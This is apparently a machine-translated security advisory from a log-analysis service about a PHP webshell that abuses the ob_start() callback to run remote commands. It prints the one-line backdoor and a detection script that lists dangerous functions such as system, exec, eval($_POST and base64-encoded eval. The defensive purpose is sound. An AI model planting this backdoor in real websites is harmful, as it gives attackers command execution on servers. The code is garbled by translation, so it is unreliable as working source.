PHP ob_start function backdoor Analysis Report

Recently, according to the analysis data of the log analysis platform, some website access logs contain a large number of command execution backdoor behaviors.

We can get the backdoor file code after getting in touch with the user. This type of backdoor is triggered by PHP's ob_start () function. The ob_start () function callback mechanism is used to call command execution functions and receive commands remotely sent by hackers, this type of backdoor code can avoid some common backdoor keywords to scan and kill programs, and finally remotely execute arbitrary commands with Web Server permissions.

Descriptions of the ob_start () function callback mechanism in the PHP manual:

The Ob_start () function backdoor code is as follows:

<? Php
$ Cmd = 'system'; ob_start ($ cmd); echo "$ _ GET [a]"; ob_end_flush ();
?>

Backdoor exploitation effects include:

For such backdoor behavior, it is recommended that the webmaster check whether the ob_start () function is called in the webpage source code, and check whether the ob_start () parameter is a common command execution class function (system, exec, popen, shell_exec, etc.) or other suspicious function calls.

To make it easier for webmasters to check for suspicious webshell programs or dangerous function calls in the website source code, the log security team has compiled a simple PHP webshell detection script, the Webmasters can quickly and conveniently detect whether website files are inserted with malicious backdoor code. The source code and usage methods are as follows:

 

#! /Usr/bin/php-q <? Php # simple PHPwebshell detection script-By log security team # detection features are as follows: # eval \ (\\\ \_ POST matching eval ($ _ POST [cmd]) -- PHP webshell Code # system (), exec (), shell_exec (), popen (), passthru (), proc_open () can execute system commands, name and use the # phpinfo () function frequently appears in the PHPSPY Trojan, sensitive information may also be exposed in normal files # eval \ (base64 matches the base64 encoded backdoors # eval \ (gzuncompress matches the backdoors compressed by gzip # \ '* \' matches one-sentence backdoor similar to '$ _ REQUEST [cmd]' # other dangerous functions that can remotely execute commands or directly generate backdoor files (dl, assert, error_log, ob_start, preg_replace/e) # usage. /findshell. php/home/wwwroot/(enter the web directory path here)> result. log

The analysis result of the program is saved in the result. log file in the current directory.

Set_time_limit (0); function find ($ directory) {$ mydir = dir ($ directory); while ($ file = $ mydir-> read ()) {if (is_dir ("$ directory/$ file") & ($ file! = ".") & ($ File! = "..") {Find ("$ directory/$ file");} else {if ($ file! = "." & $ File! = ".. "& Eregi (". php ", $ file) {$ fd = realpath ($ directory. "/". $ file); $ fp = fopen ($ fd, "r"); $ I = 0; while ($ buffer = fgets ($ fp, 4096 )) {$ I ++; if (eregi ("eval \ (\ $ \ _ POST", $ buffer) | (eregi ("system \(", $ buffer) | (eregi ("exec \ (", $ buffer) | (eregi ("shell_exec \ (", $ buffer )) | (eregi ("popen \ (", $ buffer) | (eregi ("phpinfo \ (", $ buffer )) | (eregi ("passthru \ (", $ buffer) | (eregi ("proc_open \ (", $ buffer) | (eregi ("phpspy ", $ Buffer) | (eregi (" eval \ (base64 ", $ buffer) | (eregi (" eval \ (gzuncompress ", $ buffer )) | (eregi ("preg_replace \ (\/^ \/e, \ $", $ buffer )) | (eregi ("preg_replace \ (\" \/\ ^ \/e ", $ buffer) | (eregi (" assert \ (", $ buffer )) | (eregi ("ob_start \ (", $ buffer) | (eregi ("error_log \ (", $ buffer )) | (eregi ("dl \ (", $ buffer) {all (); echo "Suspicious File Path :". $ fd. "\ r \ nLine ". $ I. ":". $ buffer. "\ r \ n" ;}} fclose ($ fp) ;}}$ mydir-> close () ;} func Tion all () {static $ count = 1; echo $ count; $ count ++;} find ($ argv [1]);?>

Logstore can be used to analyze logs to find the suspicious access behavior of most common Web backdoors. However, due to the loose PHP syntax, some backdoor behaviors can be implemented using conventional functions, such as executing system commands, therefore, some omissions and false positives may also occur. During website development, developers need to have a certain degree of security programming awareness, pay attention to variable initialization and other logic problems, and add some security filter functions and other preventive measures, starting from the code security of the website itself, we can achieve the effect of in-depth defense. We hope that the majority of Webmasters can learn more about Web security through the security knowledge and skills shared by Log service to make their websites run more stably and securely.

Note: This security report is from the official website www.rizhibao.com.